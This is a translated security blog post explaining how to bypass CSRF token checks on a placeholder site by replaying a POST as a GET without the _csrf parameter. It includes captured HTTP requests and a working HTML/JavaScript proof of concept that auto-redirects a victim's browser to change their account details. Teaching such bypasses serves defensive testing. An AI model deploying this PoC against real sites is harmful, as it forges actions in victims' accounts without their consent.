Channel: CodeSection, Code Area, Cyber Security - CodeSec

Translation 7: Bypassing CSRF

Hi folks! It is always a pleasure to share something good with you. As you can guess from the title, today I am sharing a few techniques for bypassing CSRF protection.

What is CSRF protection? In short, a CSRF (cross-site request forgery) attack targets the state-changing requests of a web site. To defend against it, developers add an anti-CSRF token to the request in one of several ways. If you want the details, have a look at these two articles: "Article-1", "Article-2".

Now assume the site is vulnhost.com and that it validates our request against data supplied in a POST request: vulnhost.com first places a _csrf token in the POST request and then validates that _csrf token on the server side.

[*] The state-changing request looks like this:

    POST /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact HTTP/1.1
    Host: en.vulnhost.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://en.vulnhost.com/mycenter/settings/account.html
    Content-Type: application/x-www-form-urlencoded; charset=UTF-8
    Wicket-Ajax: true
    Migration-Wicket: 6
    Wicket-Ajax-BaseURL: mycenter/settings/account.html
    Wicket-FocusedElementId: id49
    X-Requested-With: XMLHttpRequest
    Content-Length: 246
    Cookie: .......
    Connection: close

    _csrf=725a7f90-192f-4b94-8fc9-6320ace14fef&id48_hf_0=&gender=radio8&firstName=xx&lastName=YY&saveContact=1

Here _csrf=.... is a randomly generated token that is submitted to the server for validation. If I send the same request with the GET method and drop the _csrf token, the server does not validate it at all:

    GET /mycenter/settings/account.html?2-1.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=XX&lastName=YY&saveContact=1 HTTP/1.1
    Host: en.vulnhost.com
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:58.0) Gecko/20100101 Firefox/58.0
    Accept: application/xml, text/xml, */*; q=0.01
    Accept-Language: en-US,en;q=0.5
    Accept-Encoding: gzip, deflate
    Referer: https://en.vulnhost.com/mycenter/settings/account.html
    Wicket-Ajax: true
    Migration-Wicket: 6
    Wicket-Ajax-BaseURL: mycenter/settings/account.html
    Wicket-FocusedElementId: id49
    X-Requested-With: XMLHttpRequest
    Cookie: ...
    Connection: close

As expected the server responds 200 OK. The check to run here is simple: replay the captured request with the method switched to GET, the form body moved to the query string and the _csrf parameter removed; if the server still returns 200 and the change is applied, the token check is bound to the POST branch of the handler rather than to the state change itself, and the protection can be bypassed.

Using a typical HTML POC for the state-changing request, however, runs into some problems. I have encountered this before; the reason is that in this situation the browser has to refresh before it renders the fetched content. My guess is that the GET request carries a pile of HTTP headers that may interfere with the state-changing request. One caveat worth keeping in mind: an attacker's page cannot set Wicket-Ajax, X-Requested-With or the vulnhost.com Referer on a cross-site request, so a top-level navigation from the attacker's page arrives with none of them. If the redirect POC below succeeds, that also shows the handler does not require those headers.

To get around this, I combined JavaScript and HTML to build the POC:

    <html>
      <head>
        <script type="text/javascript">
          var timer = null;
          // Navigate the victim's browser to the state-changing GET. The browser
          // attaches the victim's vulnhost.com cookies, and no _csrf is needed.
          function auto_reload() {
            window.location = 'https://en.vulnhost.com/mycenter/settings/account.html?4-2.IBehaviorListener.0-formContact-saveContact=&id48_hf_0=&gender=radio8&firstName=Account&lastName=Takeover&saveContact=1';
          }
        </script>
      </head>
      <!-- Fire the redirect 5 seconds after the page loads. -->
      <body onload="timer = setTimeout(auto_reload, 5000);">
      </body>
    </html>

